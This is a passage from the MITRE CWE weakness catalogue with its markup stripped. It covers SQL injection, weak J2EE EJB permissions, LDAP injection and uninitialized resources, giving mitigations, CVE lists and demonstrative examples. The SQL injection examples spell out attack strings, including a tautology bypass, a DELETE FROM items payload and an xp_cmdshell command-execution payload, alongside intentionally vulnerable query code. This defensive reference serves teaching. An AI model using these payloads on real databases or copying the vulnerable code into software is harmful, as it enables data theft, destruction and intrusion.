coverage: + + Web Application Scanner + Web Services Scanner + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly. + + + + Architecture and Design + Parameterization + + If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. + Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using "exec" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867] + + + + Architecture and Design + Operation + Environment Hardening + + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + Specifically, follow the principle of least privilege when creating user accounts to a SQL database. The database users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others' data. Use the strictest permissions possible on all database objects, such as execute-only for stored procedures. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Implementation + Output Encoding + + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + Instead of building a new implementation, such features may be available in the database or programming language. For example, the Oracle DBMS_ASSERT package can check or enforce that parameters have certain properties that make them less vulnerable to SQL injection. For MySQL, the mysql_real_escape_string() API function is available in both C and PHP. + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When constructing SQL query strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping. + Note that proper output encoding, escaping, and quoting is the most effective solution for preventing SQL injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent SQL injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, the name "O'Reilly" would likely pass the validation step, since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the "'" apostrophe character, which would need to be escaped or otherwise handled. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded. + When feasible, it may be safest to disallow meta-characters entirely, instead of escaping them. This will provide some defense in depth. After the data is entered into the database, later processes may neglect to escape meta-characters before use, and you may not have control over those processes. + + + + Architecture and Design + Enforcement by Conversion + When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. + + + Implementation + + Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. + If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. + Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. + In the context of SQL Injection, error messages revealing the structure of a SQL query can help attackers tailor successful attack strings. + + + + Operation + Firewall + Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. + Moderate + An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. + + + Operation + Implementation + Environment Hardening + When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. + + + + + In 2008, a large number of web servers were compromised using the same SQL injection attack string. This single string worked against many different programs. The SQL injection was then used to modify the web sites to serve malicious code. + + + The following code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user. + + ...string userName = ctx.getAuthenticatedUserName();string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";sda = new SqlDataAdapter(query, conn);DataTable dt = new DataTable();sda.Fill(dt);... + + The query that this code intends to execute follows: + + SELECT * FROM items WHERE owner = <userName> AND itemname = <itemName>; + + However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string: + + name' OR 'a'='a + + for itemName, then the query becomes the following: + + SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name' OR 'a'='a'; + + The addition of the: + + OR 'a'='a + + condition causes the WHERE clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query: + + SELECT * FROM items; + + This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner. + + + This example examines the effects of a different malicious value passed to the query constructed and executed in the previous example. + If an attacker with the user name wiley enters the string: + + name'; DELETE FROM items; -- + + for itemName, then the query becomes the following two queries: + + SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';DELETE FROM items; + --' + + + + Many database servers, including Microsoft(R) SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database. + Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in the previous example. + If an attacker enters the string + + name'; DELETE FROM items; SELECT * FROM items WHERE 'a'='a + + Then the following three valid statements will be created: + + SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';DELETE FROM items;SELECT * FROM items WHERE 'a'='a'; + + One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from an allowlist of safe values or identify and escape a denylist of potentially malicious values. Allowlists can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, denylisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can: + + + + Target fields that are not quoted + + + Find ways to bypass the need for certain escaped meta-characters + + + Use stored procedures to hide the injected meta-characters. + + + + Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks. + Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they do not protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example. + + procedure get_item ( itm_cv IN OUT ItmCurTyp, usr in varchar2, itm in varchar2)is open itm_cv for' SELECT * FROM items WHERE ' || 'owner = '|| usr || ' AND itemname = ' || itm || ';end get_item; + + Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks. + + + MS SQL has a built in function that enables shell command execution. An SQL injection in such a context could be disastrous. For example, a query of the form: + + SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='$user_input' ORDER BY PRICE + + Where $user_input is taken from an untrusted source. + If the user provides the string: + + '; exec master..xp_cmdshell 'dir' -- + + The query will take the following form: + + SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=''; exec master..xp_cmdshell 'dir' --' ORDER BY PRICE + + Now, this query can be broken down into: + + + + a first SQL query: SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=''; + + + a second SQL query, which executes the dir command in the shell: exec master..xp_cmdshell 'dir' + + + an MS SQL comment: --' ORDER BY PRICE + + + + As can be seen, the malicious input changes the semantics of the query into a query, a shell command execution and a comment. + + + This code intends to print a message summary given the message ID. + + $id = $_COOKIE["mid"];mysql_query("SELECT MessageID, Subject FROM messages WHERE MessageID = '$id'"); + + The programmer may have skipped any input validation on $id under the assumption that attackers cannot modify the cookie. However, this is easy to do with custom client code or even in the web browser. + While $id is wrapped in single quotes in the call to mysql_query(), an attacker could simply change the incoming mid cookie to: + + 1432' or '1' = '1 + + This would produce the resulting query: + + SELECT MessageID, Subject FROM messages WHERE MessageID = '1432' or '1' = '1' + + Not only will this retrieve message number 1432, it will retrieve all other messages. + In this case, the programmer could apply a simple modification to the code to eliminate the SQL injection: + + $id = intval($_COOKIE["mid"]);mysql_query("SELECT MessageID, Subject FROM messages WHERE MessageID = '$id'"); + + However, if this code is intended to support multiple users with different message boxes, the code might also need an access control check (CWE-285) to ensure that the application user has the permission to see that message. + + + This example attempts to take a last name provided by a user and enter it into a database. + + $userKey = getUserID();$name = getUserInput(); + + # ensure only letters, hyphens and apostrophe are allowed + $name = allowList($name, "^a-zA-z'-$");$query = "INSERT INTO last_names VALUES('$userKey', '$name')"; + + While the programmer applies an allowlist to the user input, it has shortcomings. First of all, the user is still allowed to provide hyphens, which are used as comment structures in SQL. If a user specifies "--" then the remainder of the statement will be treated as a comment, which may bypass security logic. Furthermore, the allowlist permits the apostrophe, which is also a data / command separator in SQL. If a user supplies a name with an apostrophe, they may be able to alter the structure of the whole statement and even change control flow of the program, possibly accessing or modifying confidential information. In this situation, both the hyphen and apostrophe are legitimate characters for a last name and permitting them is required. Instead, a programmer may want to use a prepared statement or apply an encoding routine to the input to prevent any data / directive misinterpretations. + + + + + CVE-2021-42258 + SQL injection in time and billing software, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-42258 + + + CVE-2021-27101 + SQL injection in file-transfer system via a crafted Host header, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-27101 + + + CVE-2020-12271 + SQL injection in firewall product's admin interface or user portal, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-12271 + + + CVE-2019-3792 + An automation system written in Go contains an API that is vulnerable to SQL injection allowing the attacker to read privileged data. + https://www.cve.org/CVERecord?id=CVE-2019-3792 + + + CVE-2004-0366 + chain: SQL injection in library intended for database authentication allows SQL injection and authentication bypass. + https://www.cve.org/CVERecord?id=CVE-2004-0366 + + + CVE-2008-2790 + SQL injection through an ID that was supposed to be numeric. + https://www.cve.org/CVERecord?id=CVE-2008-2790 + + + CVE-2008-2223 + SQL injection through an ID that was supposed to be numeric. + https://www.cve.org/CVERecord?id=CVE-2008-2223 + + + CVE-2007-6602 + SQL injection via user name. + https://www.cve.org/CVERecord?id=CVE-2007-6602 + + + CVE-2008-5817 + SQL injection via user name or password fields. + https://www.cve.org/CVERecord?id=CVE-2008-5817 + + + CVE-2003-0377 + SQL injection in security product, using a crafted group name. + https://www.cve.org/CVERecord?id=CVE-2003-0377 + + + CVE-2008-2380 + SQL injection in authentication library. + https://www.cve.org/CVERecord?id=CVE-2008-2380 + + + CVE-2017-11508 + SQL injection in vulnerability management and reporting tool, using a crafted password. + https://www.cve.org/CVERecord?id=CVE-2017-11508 + + + + + SQL injection + + + SQL Injection + + + SQL injection + + + A2 + Injection Flaws + CWE More Specific + + + A1 + Unvalidated Input + CWE More Specific + + + A6 + Injection Flaws + CWE More Specific + + + 19 + SQL Injection + + + SFP24 + Tainted input to command + + + ASCSM-CWE-89 + + + IDS00-J + Prevent SQL injection + Exact + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + SQL injection can be resultant from special character mismanagement, MAID, or denylist/allowlist problems. It can be primary to authentication errors. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + 1.0 + 2008-09-09 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + 1.0 + 2008-09-09 + added/updated white box definitions + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Modes_of_Introduction, Name, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-01-12 + updated Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Name, Related_Attack_Patterns + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Name, White_Box_Definitions + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, Observed_Examples, References, Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples, Potential_Mitigations, Relationship_Notes + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + SQL Injection + Failure to Sanitize Data into SQL Queries (aka 'SQL Injection') + Failure to Sanitize Data within SQL Queries (aka 'SQL Injection') + Failure to Preserve SQL Query Structure (aka 'SQL Injection') + Failure to Preserve SQL Query Structure ('SQL Injection') + Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection') + + + + If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the product. + If the EJB deployment descriptor contains one or more method permissions that grant access to the special ANYONE role, it indicates that access control for the application has not been fully thought through or that the application is structured in such a way that reasonable access control restrictions are impossible. + + + + + + Architecture and Design + + + Implementation + + + + + Other + Other + + + + + Architecture and Design + System Configuration + Follow the principle of least privilege when assigning access rights to EJB methods. Permission to invoke EJB methods should not be granted to the ANYONE role. + + + + + The following deployment descriptor grants ANYONE permission to invoke the Employee EJB's method named getSalary(). + + <ejb-jar>...<assembly-descriptor><method-permission><role-name>ANYONE</role-name><method><ejb-name>Employee</ejb-name><method-name>getSalary</method-name></method-permission></assembly-descriptor>...</ejb-jar> + + + + + + J2EE Misconfiguration: Weak Access Permissions + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Misconfiguration: Weak Access Permissions + + + + The product constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component. + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + Read Application Data + Modify Application Data + An attacker could include input that changes the LDAP query which allows unintended commands or code to be executed, allows sensitive data to be read or modified or causes other unintended behavior. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + + + The code below constructs an LDAP query using user input address data: + + context = new InitialDirContext(env);String searchFilter = "StreetAddress=" + address;NamingEnumeration answer = context.search(searchBase, searchFilter, searchCtls); + + Because the code fails to neutralize the address string used to construct the query, an attacker can supply an address that includes additional LDAP queries. + + + + + CVE-2021-41232 + Chain: authentication routine in Go-based agile development product does not escape user name (CWE-116), allowing LDAP injection (CWE-90) + https://www.cve.org/CVERecord?id=CVE-2021-41232 + + + CVE-2005-2301 + Server does not properly escape LDAP queries, which allows remote attackers to cause a DoS and possibly conduct an LDAP injection attack. + https://www.cve.org/CVERecord?id=CVE-2005-2301 + + + + + LDAP injection + + + A2 + Injection Flaws + CWE More Specific + + + 29 + LDAP Injection + + + SFP24 + Tainted input to command + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Factors: resultant to special character mismanagement, MAID, or denylist/allowlist problems. Can be primary to authentication and verification errors. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations, Relationship_Notes + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + LDAP Injection + Failure to Sanitize Data into LDAP Queries (aka 'LDAP Injection') + Failure to Sanitize Data into LDAP Queries ('LDAP Injection') + + + + The product uses or accesses a resource that has not been initialized. + When a resource has not been properly initialized, the product may behave unexpectedly. This may lead to a crash or invalid memory access, but the consequences vary depending on the type of resource and how it is used within the product. + + + + + + + Primary + + + Resultant + + + + + + + + Implementation + + + Medium + + + Confidentiality + Read Memory + Read Application Data + When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party. + + + Availability + DoS: Crash, Exit, or Restart + The uninitialized resource may contain values that cause program flow to change in ways that the programmer did not intend. + + + + + Implementation + Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all required steps. + + + Implementation + Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization. + + + Implementation + Avoid race conditions (CWE-362) during initialization routines. + + + Build and Compilation + Run or compile the product with settings that generate warnings about uninitialized variables or data. + + + + + Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached. + + private boolean initialized = true;public void someMethod() { + if (!initialized) { + + + // perform initialization tasks + ... + initialized = true; + } + + + + + + The following code intends to limit certain operations to the administrator only. + + $username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {$uid = ExtractUserID($state);} + + # do stuff + if ($uid == 0) {DoAdminThings();} + + If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to "0" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident. + + + The following code intends to concatenate a string to a variable and print the string. + + char str[20];strcat(str, "hello world");printf("%s", str); + + This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory. + If a null terminator is found before str[8], then some bytes of random garbage will be printed before the "hello world" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found. + If a null terminator isn't found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn't found before the end of the memory segment is reached, leading to a segmentation fault and crash. + + + This example will leave test_string in an + unknown condition when i is the same value as err_val, + because test_string is not initialized + (CWE-456). Depending on where this code segment appears + (e.g. within a function body), test_string might be + random if it is stored on the heap or stack. If the + variable is declared in static memory, it might be zero + or NULL. Compiler optimization might contribute to the + unpredictability of this address. + + char *test_string; + if (i != err_val) + { + test_string = "Hello World!"; + } + printf("%s", test_string); + + When the printf() is reached, + test_string might be an unexpected address, so the + printf might print junk strings (CWE-457). + + To fix this code, there are a couple approaches to + making sure that test_string has been properly set once + it reaches the printf(). + One solution would be to set test_string to an + acceptable default before the conditional: + + + char *test_string = "Done at the beginning"; + if (i != err_val) + { + test_string = "Hello World!"; + } + printf("%s", test_string); + + Another solution is to ensure that each + branch of the conditional - including the default/else + branch - could ensure that test_string is set: + + char *test_string; + if (i != err_val) + { + test_string = "Hello World!"; + } + else { + test_string = "Done on the other side!"; + } + printf("%s", test_string); + + + + + + CVE-2019-9805 + Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory corruption. + https://www.cve.org/CVERecord?id=CVE-2019-9805 + + + CVE-2008-4197 + Use of uninitialized memory may allow code execution. + https://www.cve.org/CVERecord?id=CVE-2008-4197 + + + CVE-2008-2934 + Free of an uninitialized pointer leads to crash and possible code execution. + https://www.cve.org/CVERecord?id=CVE-2008-2934 + + + CVE-2008-0063 + Product does not clear memory contents when generating an error message, leading to information leak. + https://www.cve.org/CVERecord?id=CVE-2008-0063 + + + CVE-2008-0062 + Lack of initialization triggers NULL pointer dereference or double-free. + https://www.cve.org/CVERecord?id=CVE-2008-0062 + + + CVE-2008-0081 + Uninitialized variable leads to code execution in popular desktop application. + https://www.cve.org/CVERecord?id=CVE-2008-0081 + + + CVE-2008-3688 + Chain: Uninitialized variable leads to infinite loop. + https://www.cve.org/CVERecord?id=CVE-2008-3688 + + + CVE-2008-3475 + Chain: Improper initialization leads to memory corruption. + https://www.cve.org/CVERecord?id=CVE-2008-3475 + + + CVE-2005-1036 + Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap + https://www.cve.org/CVERecord?id=CVE-2005-1036 + + + CVE-2008-3597 + Chain: game server can access player data structures before initialization has happened leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2008-3597 + + + CVE-2009-2692 + Chain: uninitialized function pointers can be dereferenced allowing code execution + https://www.cve.org/CVERecord?id=CVE-2009-2692 + + + CVE-2009-0949 + Chain: improper initialization of memory can lead to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-0949 + + + CVE-2009-3620 + Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-3620 + + + + + EXP33-C + Do 